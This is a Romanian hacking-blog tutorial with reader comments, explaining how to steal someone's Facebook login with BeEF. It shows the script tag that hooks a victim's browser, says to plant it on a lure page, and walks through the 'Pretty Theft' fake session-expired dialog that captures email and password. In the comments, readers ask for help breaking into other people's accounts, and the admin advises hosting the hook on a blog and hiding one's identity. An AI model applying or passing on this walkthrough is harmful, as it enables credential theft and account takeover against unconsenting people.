BlackWeb.ro

Top Menu

  • Descarcă BlackWeb OS
  • Grup Facebook – Ethical Hacking România
  • Despre
  • Contact

Main Menu

  • Home
  • Ghiduri Linux
  • Ghiduri Metasploit
  • Spargere parole
  • Spargere rețele Wi-Fi
  • Mai multe
    • Inginerie Socială
    • Ghiduri video
    • Cursuri Hacking
    • Alte articole
  • Descarcă BlackWeb OS
  • Grup Facebook – Ethical Hacking România
  • Despre
  • Contact

logo

BlackWeb.ro

  • Home
  • Ghiduri Linux
  • Ghiduri Metasploit
  • Spargere parole
  • Spargere rețele Wi-Fi
  • Mai multe
    • Inginerie Socială
    • Ghiduri video
    • Cursuri Hacking
    • Alte articole
  • Evitarea firewall-urilor și a IDS/IPS-urilor în timp ce scanăm ținta

  • Cum trimitem mesaje criptate utilizând tehnologia Blockchain și sistemul de operare BlackWeb OS

  • Cum imităm un DNS pe LAN pentru a redirecționa traficul către un site fals utilizând BlackWeb OS

  • Cum clonăm orice website cu BlackWeb & HTTrack

  • Cum spargem parole – Cum utilizăm BlackWeb & CUPP pentru generarea listelor cu parole (#7)

HackingInginerie SocialăTutoriale
Home›Hacking›Cum spargem un cont de Facebook utilizând ingineria socială [BeEF attack]

Cum spargem un cont de Facebook utilizând ingineria socială [BeEF attack]

By BlackWeb.ro
March 2, 2018
12245
29
Share:

Bine ați revenit, dragii mei greenhorn hackers!

Multe persoane au accesat blogul blackweb.ro prin căutări de genul ,,cum spargi o parolă facebook“, ,,cum spargi un cont facebook“, ,,facebook hacking“, ,,soft de spart parole facebook gratuit”, ,,metode uluitoare de spart parole facebook”, ,,spargere parole facebook online”, ,,cum spargem parole facebook contra cost”, ,,program de spart parole facebook tpu beef”, ,,program de spart parole facebook online gratis beef”, ,,spargere cont facebook 2018″, ,,conturi de facebook sparte beef” și multe alte interogări. În primul rând, să nu credeți că o parolă facebook nu poate fi spartă. Totuși, lucrul acesta necesită anumite abilități, pe care le puteți dobândi doar dacă sunteți atenți puțin la ceea ce se postează pe blackweb.ro



Uneori, dacă deții mici abilități, puțin noroc și puține cunoștințe de inginerie socială, poți obține datele de logare facebook ale oricărei persoane. Despre asta este acest tutorial. Dacă nu îți rezervi puțin timp să instalezi Black|Web și să înveți câteva lucruri despre Linux, citind tutorialele Blackweb.ro, această metodă nu va funcționa pentru tine, însă dacă îți rezervi puțin timp să studiezi aici pe Blackweb, o să reușești să obții datele de logare ale unui cont facebook cu această tehnică simplă.
(Toți utilizatorii facebook să fiți atenți, dacă nu doriți să fiți hackuiți!)

Pasul 1: Instalăm Black|Web OS (dacă nu cumva am făcut deja lucrul acesta)

Primul lucru pe care îl avem de făcut este să descărcăm Black|Web. De ce? Pentru că nu putem face un asemenea hack pe sistemul de operare Windows. În Black|Web există un program numit Browser Exploitation Framework (BeEF). Programul este capabil să ne ajute să preluăm controlul browserului victimelor noastre. O dată ce avem controlul browser-ului, sunt foarte multe lucruri pe care le putem face. Unul dintre aceste lucruri este să-i păcălim să ne ofere datele conturilor facebook.

Pasul 2: Deschidem BeEF

Deschidem Black|Web și o să fim întâmpinați de acest screen. Pornim BeEF dând click pe iconița cu văcuța din partea stângă a desktop-ului.

 

Când dăm click pe ea, BeEF pornește printr-un terminal.



BeEF este un program ce lucrează în background-ul web server-ului sistemului nostru, pe care îl putem accesa din browser. O dată ce BeEF rulează, deschidem browser-ul și îi accesăm interfața. Ne logăm cu username-ul beef și parola beef.

O să fim întâmpinați de ,,ecranul de pornire”, să-i spun așa.

Pasul 3: ,,Pescuim” browser-ul victimei



Aceasta poate fi partea cea mai dificilă a hack-ului, pentru un începător, însă pentru cineva care are cunoștințe medii, această parte este simplă ca ,,bună ziua”. Așadar, dacă sunteți începători, nu vă aventurați mai departe. O veți da în bară, cel mai probabil. Mai așteptați puțin și mai documentați-vă. În special pe Blackweb, deoarece este singurul blog din România care vă învața așa ceva.
La acest pas, trebuie să faceți victima să dea click pe un link care conține un cod JavaScript, pentru a le ,,prinde” browser-ul. Ca și cum așezați momeala în acul undiței.

Cea mai simplă metodă este de a insera codul în propriul site și a scrie un articol interesant pentru victimă. Lucrul acesta se poate face prin inserarea unui link într-un text precum: Click aici pentru mai multe detalii sau Click aici pentru a vizualiza clip-ul. Folosiți-vă imaginația!

Scriptul arată ceva de genul:

<script src= “http://192.168.1.101:3000/hook.js&#8221 ; type= “text/javascript” ></script>

Pus într-o pagină web, iar atunci când cineva dă click pe el, tu deții controlul browser-ului. De aici, eu o să presupun că voi ați ,,agățat” browser-ul victimei.

Pasul 4: Trimitem o căsuță de dialog victimei

Atunci când am ,,agățat” browser-ul victimei, adresa IP, împreună cu pictogramele sistemului de operare și browser-ului ne va apărea în “Hooked Browsers” din partea stângă. Aici am utilizat browser-ul meu, pentru demonstrație. Chiar nu sunt atât de prost să fac o demonstrație utilizând o victimă, să le dau motiv ăstora să mă arunce la închisoare, pentru violarea corespondenței. Cât se mai dă? Între 3 și 5 ani?

Dacă dăm click pe browser-ul ,,agățat”, BeEF va deschide interfața în partea dreaptă. Observați că inițial avem detalii despre browser. Pe deasupra, mai avem câteva tab-uri. Momentan, pe noi ne interesează tab-ul ,,Commands”.

Dăm click pe tab-ul ,,Commands”, apoi dăm scroll down prin ,,Modules Tree” până ajungem la ,,Social Engineering” și dăm click pe acesta pentru a vedea mai multe detalii. Ni se vor arăta numeroase module dedicate ingineriei sociale. Dăm click pe ,,Pretty Theft”, care va deschide ,,Module Results History” și fereastra ,,Pretty Theft”



Acest modul ne permite să trimitem o fereastră pop-up în browser-ul victimei. În cazul nostru o să folosim căsuța de dialog Facebook.

Dacă dăm click pe ,,Dialog Type”, putem vedea că acest modul ne permite să mai creăm câte o căsuță de dialog și pentru LinkedIn, Windows, YouTube, Yammer, sau o căsuță de dialog generală. Selectăm ,,Facebook” în ,,Dialog Type”, apoi dăm click pe butonul ,,Execute”

Pasul 5: Căsuța de dialog apare pe sistemul victimei

Când dăm click pe ,,Execute” în BeEF, o căsuță de dialog apare în browser-ul victimei, precum cea de mai jos. Spune victimei că sesiunea Facebook a expirat și trebuie să își introducă din nou datele de logare.

Chiar dacă tu ești suspicios la vederea unui astfel de pop-up, cei mai mulți utilizatori chiar vor crede că sesiunea le-a expirat și vor introduce adresa de mail și parola.

Pasul 6: Adunăm datele

În interfața BeEF. putem vedea că aceste date apar în fereastra ,,COmmand results”. Victima a introdus adresa de mail și parola, iar acestea au fost capturate de BeEF.



Dacă sunteți cu adevărat determinați să spargeți cât mai multe conturi facebook, trebuie să știți că lucrul acesta nu este imposibil, iar ceea ce v-am prezentat este doar una din multele metode de a face lucrul acesta (probabil aceasta este ce mai simplă).

Dacă vrei să dezvolți abilitățile unui hacker cu adevărat competent, poți începe chiar acum, pe Blackweb.ro. Te asigur că vei căpăta cea mai prețioasă abilitate a secolului 21 – hacking-ul.



TagsBeEfconturi de facebook sparte beefcum spargem un cont facebookfacebook hackhackingInginerie Socialămetode uluitoare de spart parole facebookprogram de spart parole facebook online gratis beefprogram de spart parole facebook tpu beefsocial engineeringsoft de spart parole facebook gratuitspargem parole facebook contra costspargere cont facebook 2018spargere parole facebook online
Previous Article

Cum să hack-uim camerele video CCTV private

Next Article

Cum scanăm internetul pentru a căuta vulnerabilitățile ...

0
Shares
  • 0
  • +
  • 0
  • 0
  • 0
  • 0

Related articles More from author

  • ArticoleInginerie Socială

    Pericolul din spatele testelor aparent inofensive de pe Facebook

    November 11, 2017
    By BlackWeb.ro
  • HackingTutoriale

    Cum utilizăm Netcat?

    November 30, 2018
    By BlackWeb.ro
  • ArticoleInginerie Socială

    Ce este ingineria socială?

    November 4, 2017
    By BlackWeb.ro
  • ArticoleHackingInginerie Socială

    Cum trimit hackerii sms-uri false, făcând să pară că sunt trimise din partea unei anumite persoane

    March 6, 2018
    By BlackWeb.ro
  • HackingMetasploitTutoriale

    Metasploit pentru hackerii aspiranți – Autopwn (#7)

    August 1, 2018
    By BlackWeb.ro
  • ArticoleHackingStrategii&Metode de spargere a parolelor

    Cum spargem parole (#1)

    September 6, 2017
    By BlackWeb.ro

29
Leave a Reply

avatar
wpdiscuz_captcharefresh
6 Comment threads
23 Thread replies
4 Followers
 
Most reacted comment
Hottest comment thread
15 Comment authors
ArhitectulStefanCristinaButoiIonut Recent comment authors
avatar
wpdiscuz_captcharefresh
  Subscribe  
newest oldest most voted
Notify of
Andrei
Guest
Andrei

daca m-ar putea ajuta care-va sunt ebrahim fatal alfo pe facebook va rog ajutati-ma ofe

Vote Up-1Vote Down  Reply
1 year ago
Edi
Guest
Edi

Lasă dracu’ hacăreala, Andreiuț! Pune mâna pe o carte de gramatică! 👍

Vote Up1Vote Down  Reply
1 year ago
Luigi
Guest
Luigi

@Edi: :))))

Vote Up0Vote Down  Reply
1 year ago
sergiu somesan
Guest
sergiu somesan

O simplă căutare o să vă arate că am peste 20 de volume publicate. În ultimul roman la care tocmai lucrez folosesc și un hacker pentru spargerea unui cont. Credeți că scena descrisă este veridică? Promit un volum cu autograf pentru această „consultanță” 🙂 Nu-l cunoșteam decât sub numele de Tache și nu aveam de la el decât un număr de telefon unde nu îmi răspundea nimeni, niciodată ci doar căsuța vocală unde lăsam un mesaj. Îl sunasem ieri și azi dimineața am primit un SMS prin care îmi era stabilită o întâlnire pentru azi la ora șase seara în… Read more »

Vote Up1Vote Down  Reply
1 year ago
Arhitectul
Admin
Arhitectul

Un hacker care să se prezinte cu numele/pseudonimul de Tache? Dați un search pe google la ,,hacking pseudonyms”, să vă faceți o idee… No offence, dar dacă un hacker s-ar prezenta cu numele de Tache, personal, l-aș considera puțin retardat. Pe deasupra, obișnuiți să mâncați virgule, iar ,,țineți” se scrie fără cratimă în exemplul dvs. Scriem cu cratimă dacă am spune ,,ține-ți minte propriul cod”. Desigur, mai sunt și alte greșeli, dar asta e treaba editorului dvs., nu a mea. Revenind la scena descrisă de dvs. Un cont de facebook se poate sparge în câteva minute butonând telefonul doar în… Read more »

Vote Up1Vote Down  Reply
1 year ago
sergiu somesan
Guest
sergiu somesan

Mulțumesc, am să modific în consecință …

Vote Up0Vote Down  Reply
1 year ago
Cosmin
Guest
Cosmin

Referitor la spargerea unui cont de facebook folosind ingineria
sociala , trebuie sa trimit persoanei in cauza un link cu o pagina web
hostata , adica online ????
Si scriptul din tutorial trebuie sa fie asemanator cu al vostru , as
avea nevoie de putin ajutor

Multumesc !!!

Vote Up0Vote Down  Reply
1 year ago
Arhitectul
Admin
Arhitectul

Poți integra script-ul într-un blog hostat de blogspot, pe care este scris un articol de interes pentru victimă. Scriptul este oferit de Beef. Tot ce se schimbă este ip-ul.

Vote Up0Vote Down  Reply
1 year ago
Cosmin
Guest
Cosmin

Ati putea sa faceti un tutorial in care sa ne prezentati cum trebuie sa ne protejam pentru a nu fi identificati?

Vote Up0Vote Down  Reply
1 year ago
BlackWeb.ro
Author
BlackWeb.ro

Avem un astfel de tutorial aici: https://blackweb.ro/cum-rutam-tot-traficul-din-kali-linux-prin-tor-utilizand-whonix/ Totuși, trebuie să ținem minte un lucru: Cineva cu timp și resurse ne poate identifica oricând, indiferent de câte măsuri ne-am lua noi… Cei care spun că ei știu cum să rămână ,,complet invizibili”, mănâncă rahat cu ambele mâini. Personal, eu, un amărât de blogger, pot localiza și afla identitatea multora care doresc să rămână anonimi. Gândește-te ce ar putea face cineva’, cu mai multe cunoștințe ca ale mele și cu mulți bani la dispoziție… În special autoritățile. Că cei de la noi din țară sunt mai înceți la minte puțin și durează… Read more »

Vote Up0Vote Down  Reply
1 year ago
Cosmin
Guest
Cosmin

Tutorialul recomandat de dv. este doar pentru cei care folosesc kali linux pe virtualbox ca si sistem de operare secundar, nu?
Eu voiam niste sfaturi despre cum ne-am putea proteja identitatea atunci cand avem kali linux ca si sistem de operare principal.

Vote Up0Vote Down  Reply
1 year ago
Arhitectul
Admin
Arhitectul

Tutorialul prezentat este pentru cei care doresc să utilizeze Kali+Whonix prin Virtualbox, ceea ce este puțin mai greu.

Dacă aveți Kali instalat, puneți whonix pe un stick usb și îl rulați direct din Kali. Mai multe detalii pe:
https://www.whonix.org/wiki/Download

Acum, să răspund și la întrebarea de mai jos, dacă utilizatorul este pe fb utilizând aplicația fb pentru mobil, metoda nu va funcționa. Va trebui să așteptați să fie conectat de pe pc, înainte să inițiați atacul.

Vote Up1Vote Down  Reply
1 year ago
Cosmin
Guest
Cosmin

Metoda este valabila daca persoana in cauza foloseste un telefon mobil cu android sau ios???

Vote Up0Vote Down  Reply
1 year ago
Luigi
Guest
Luigi

Nu. Trebuie sa foloseasca pc-ul.

Vote Up0Vote Down  Reply
1 year ago
Ioana
Guest
Ioana

Si o metoda de spart parola la facebook cand este conectat de pe telefon exista ? 😀

Vote Up0Vote Down  Reply
10 months ago
Arhitectul
Admin
Arhitectul

Există, dar e nevoie de mai multă creativitate. 🙂

Vote Up0Vote Down  Reply
10 months ago
Bianca Pacuraru
Guest
Bianca Pacuraru

Arhitectul, putem lua legatura in privat?

Vote Up0Vote Down  Reply
10 months ago
Arhitectul
Admin
Arhitectul

@Bianca: Există secțiunea “Contact”. Însă te rog să citești cu mare atenție ce scrie acolo, înainte de a trimite mesajul.

Vote Up1Vote Down  Reply
10 months ago
Ciprian
Guest
Ciprian

Ma poti ajuta si pe mine

Vote Up0Vote Down  Reply
9 months ago
Arhitectul
Admin
Arhitectul

Mă-ntrebi? Sau îmi spui? 🙂

Vote Up0Vote Down  Reply
9 months ago
Ionut
Guest
Ionut

Solicit ajutorul dvs. contracost.Astept raspuns.Multumesc!

Vote Up0Vote Down  Reply
7 months ago
Arhitectul
Admin
Arhitectul

O să presupun că nu ați citit ce scrie la secțiunea CONTACT, de aceea citez:
“Nu ne contactați pentru a ne ruga să spargem parolele iubiților, iubitelor, amanților, amantelor, sau a soților și soțiilor care vă înșală. Adresați-vă unui psiholog, faceți o terapie de cuplu, divorțați, sau orice altceva, însă nu ne mai deranjați cu astfel de lucruri. ”

Ajutorul nostru, contracost, se oferă doar celor care doresc să le verificăm securitatea sistemelor.

Vote Up1Vote Down  Reply
7 months ago
Butoi
Guest
Butoi

Ma m uitat pe blog si am vazut soc soc soc, cum poti sparge un cont de facebook, eu am incercat si la beef cand vreau sa ma log, nu pot scrie nimic. ( daca ma poti ajuta ) adica daca dau control + a vad ce este scris dar nu merg user sau pass

Vote Up0Vote Down  Reply
3 months ago
Arhitectul
Admin
Arhitectul

Șoc șoc șoc șoc șoc șoc șoc șoc șoc… Ce distribuție folosești?

Vote Up0Vote Down  Reply
3 months ago
Cristina
Guest
Cristina

Cum sparg o parola de mess?

Vote Up0Vote Down  Reply
3 months ago
Cristina
Guest
Cristina

Cum se face ? Mar interesa

Vote Up0Vote Down  Reply
3 months ago
Stefan
Guest
Stefan

Buna!Exista vreo metoda de a afla parola cuiva de facebook,fara a interactiona cu acesta?fara a-i trimite vreun mesaj sau link ?ca asa as putea trimite o poza sau orice altceva in care e ascuns un keylogger,sa-l pun sa l descarce si gata,dar o persoana cu mai mult de un neuron ar deveni suspicioasa…

Vote Up0Vote Down  Reply
1 month ago
Stefan
Guest
Stefan

Buna!Aceasta metoda functioneaza si daca victima acceseaza site-ul de pe mobil?

Vote Up0Vote Down  Reply
1 month ago
Arhitectul
Admin
Arhitectul

Dacă folosește aplicația, nu.

Vote Up0Vote Down  Reply
1 month ago

S-ar putea să îți placă și

  • Linux: Elemente de bază

    Linux: Serverele Web Apache (#11)

  • HackingStrategii&Metode de spargere a parolelorTutoriale

    Cum spargem parole utilizând Hashcat (#3)

  • Linux: Elemente de bază

    Linux: Managementul proceselor (#8)




Alătură-te conversațiilor:

  • Arhitectul on Cum spargem un cont de Facebook utilizând ingineria socială [BeEF attack]Dacă folosește aplicația, nu.
  • Stefan on Cum spargem un cont de Facebook utilizând ingineria socială [BeEF attack]Buna!Aceasta metoda functioneaza si daca victima acceseaza site-ul de pe mobil?
  • Stefan on Cum spargem un cont de Facebook utilizând ingineria socială [BeEF attack]Buna!Exista vreo metoda de a afla parola cuiva de facebook,fara a interactiona cu acesta?fara a-i trimite vreun mesaj sau link
  • Stefan on Cum spargem parole (#1)De fapt,pana la urma,tot l-am instalat,am citit pe site-ul de pe care l-am descarcat ca il va detecta ca fiind
  • Stefan on Cum spargem parole (#1)Buna! De unde pot descarca Cain and Abel fara virusi?Am descarcat odata si mi-a luat antivirusul razna..imi puteti da un
  • Daniela on Cum spargem parole: Strategii de spargere (#2)Va implor ajutatima sa aflu parola la adresa aceasta va implor !!! https://www.facebook.com/cedric.angeliquebailly
  • Robert on Cum spargem parole: Strategii de spargere (#2)As avea nevoie de un asemenea serviciu contracost se poate ??? Daca da as vrea sa cunosc cateva detalii ...
  • Robert on Cum găsim site-uri vulnerabile utilizând Shodan – Cel mai periculos motor de căutare din lumeSalut m -ar interesa
  • Arhitectul on Cum spargem parole: Strategii de spargere (#2)Învățând semnele de punctuație...
  • gabriela raluca on Cum spargem parole: Strategii de spargere (#2)sall cf vreau sa sparg un cont de facebook cum fac
(C) BlackWeb Security 2017 - 2019
Access BlackWeb Security.
wpDiscuz